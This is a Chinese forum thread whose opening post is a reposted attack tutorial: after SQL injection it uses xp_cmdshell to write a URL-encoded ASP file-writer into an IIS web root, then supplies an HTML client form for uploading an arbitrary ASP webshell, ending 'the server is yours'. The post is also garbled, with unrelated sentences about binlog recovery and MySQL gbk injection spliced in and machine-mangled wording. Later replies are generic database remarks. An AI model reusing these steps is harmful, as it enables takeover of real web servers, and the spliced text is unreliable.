仓酷云

标题: MSSQL编程：SQL注进与ASP木即刻传 [打印本页]

作者: 灵魂腐蚀 时间: 2015-1-16 22:40
标题: MSSQL编程：SQL注进与ASP木即刻传
但我们知道，若使用statement，并没有上述需要的数据。试想binlog中记录了一句updatetsetf1=3whereid=3。怎么恢复呢？木马|上传SQL注进后，怎样上传木马，一向是对照头疼的事，我这里供应上传木马的一种另外一种办法。1、SQL注进的时分，用xp_cmdshell向服务器上写进一个能写文件的asp文件。文件内容：<%SetobjFSO=Server.createObject("Scripting.FileSystemObject")SetobjCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Writerequest("mydata")objCountFile.Close%>这个文件能够写成一行<%SetobjFSO=Server.createObject("Scripting.FileSystemObject"):SetobjCountFile=objFSO.createTextFile(request("mypath"),True):objCountFile.Writerequest("mydata"):objCountFile.Close%>将特别字符举行编码就能够失掉%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E注进（这里假定web目次是C:Inetpubwwwroot）：execmaster..xp_cmdshellecho"%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E">C:Inetpubwwwrootftp.asp;如许在服务器的web目次下将天生一个ftp.asp文件该文件的代码为<%SetobjFSO=Server.createObject("Scripting.FileSystemObject")SetobjCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Writerequest("mydata")objCountFile.Close%>你能够看到，下面代码中预留了两个接口mypath和mydatamypath是下次提交的时分文件的天生路径mydata是文件的内容在当地编写一个客户端文件例：RohuClient.htm代码以下<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01Transitional//EN"><html><head><metahttp-equiv="Content-Type"content="text/html;charset=gb2312"><title>肉鸡文件天生器--客户端制造：相对零度QQ:12216796</title><styletype="text/css"></style></head><scriptlanguage="javascript"type="text/javascript">functionchk(theform){if(theform.ftpUrl.value==){alert(请输出递交的地点！);theform.ftpUrl.focus();returnfalse;}if(theform.MyPath.value==){alert(请输出天生文件的地位！);theform.MyPath.focus();returnfalse;}if(theform.MyData.value==){alert(请输出天生文件的内容！);theform.MyData.focus();returnfalse;}theform.action=theform.ftpUrl.value;}</script><body><formname="RohuForm"method="post"action=""onSubmit="returnchk(this)"target="_blank"><tablewidth="673"border="0"align="center"cellpadding="0"cellspacing="0"><tr><tdwidth="11%">方针地位：</td><tdwidth="79%"><inputname="ftpUrl"type="text"id="ftpUrl"size="50">例：http://127.0.0.1/FTP.ASP<;/td></tr><tr><td>天生文件：</td><td><inputname="MyPath"type="text"id="MyPath">将在服务器上，天生的文件路径。例：C:Inetpubwwwrooterver.asp</td></tr><tr><tdvalign="top">文件代码：</td><td><textareaname="MyData"cols="100"rows="10"id="textarea"></textarea></td></tr><tr><td></td><td><inputtype="submit"name="Submit"value="提交"></td></tr></table><br></form><tablewidth="100%"border="0"cellspacing="0"cellpadding="0"><tr><tdalign="center">版权一切：相对零度（<ahref="http://www.rohu.com";>虎盟</a>）</td></tr></table></body></html>在方针地位栏填上方才天生的ftp.asp文件的url地点如http://127.0.0.1/ftp.asp（这里假定服务器的ip是127.0.0.1）在天生文件栏输出将在服务器上天生的文件名好比：C:Inetpubwwwrooterver.asp在文件内容里，随便的粘贴一个asp代码点递交，当http://127.0.0.1/ftp.asp文件实行终了基础上服务器上的asp木马就天生了。扫瞄http://127.0.0.1/Server.ASP呵呵服务器就是你的了Hoky:这篇文章前段工夫不晓得在谁人中央看过.转贴的时分就没有写作者是谁.我也不记得了.mysql使用内部操作字符集gbk来进行操作，即执行"SELECT*FROMtestWHEREname=xxxor1=1/*LIMIT1";从而注入成功

作者: 变相怪杰 时间: 2015-1-19 21:12
每天坚持做不一样的是，认真做笔录，定时复习。一个月你就可以有一定的收获。当然如果你想在sql方面有一定的造诣，你少不了需要看很多很多的书籍了。

作者: 简单生活 时间: 2015-1-25 15:17
对于微软系列的东西除了一遍遍尝试还真没有太好的办法

作者: 金色的骷髅 时间: 2015-2-2 22:35
如果，某一版本可以提供强大的并发响应，但是没有Oracle的相应版本稳定，或者价格较贵，那么，它就是不适合的。

作者: 只想知道 时间: 2015-2-8 17:55
分区表效率问题肯定是大家关心的问题。在我的试验中，如果按照分区字段进行的查询（过滤）效率会高于未分区表的相同语句。但是如果按照非分区字段进行查询，效率会低于未分区表的相同语句。

作者: 柔情似水 时间: 2015-2-25 22:02
SQLServer的异构移植功能个人感觉最好了。（如果对比过SQLServer的链接服务器和Oracle的透明网关的朋友会发现SQLServer的sp_addlinkedserver(openquery)异构数据库系列比Oracle真是强太多了。）

作者: 精灵巫婆 时间: 2015-3-8 07:43
多加的系统视图和实时系统信息这些东西对DBA挑优非常有帮助，但是感觉粒度还是不太细。

作者: 飘飘悠悠 时间: 2015-3-15 21:20
光写几个SQL实在叫无知。

作者: 灵魂腐蚀 时间: 2015-3-22 05:05
sqlserver的痛苦之处在于有用文档的匮乏，很多只是表明的东西

欢迎光临仓酷云 (http://ckuyun.com/)